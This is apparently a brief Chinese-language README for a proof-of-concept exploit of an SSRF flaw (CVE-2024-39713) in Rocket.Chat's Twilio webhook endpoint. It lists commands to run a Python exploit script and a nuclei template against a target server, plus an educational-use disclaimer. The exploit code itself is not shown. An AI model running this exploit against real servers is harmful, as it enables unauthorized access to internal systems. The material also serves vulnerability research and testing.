服务器端请求伪造(SSRF)影响了Rocket.Chat的Twilio webhook端点,版本低于6.10.1。
链接:
pip install -r requirements.txt
python3 CVE-2024-39713.py -u [Rocket.Chat URL] -t [SSRF target]
nuclei -t CVE-2024-39713.yaml -u [Rocket.Chat URL]

此概念验证(PoC)仅供教育和研究目的。旨在帮助安全专业人员、开发人员和研究人员理解和缓解漏洞。
作者不对因使用此PoC而导致的任何滥用、损害或法律后果负责。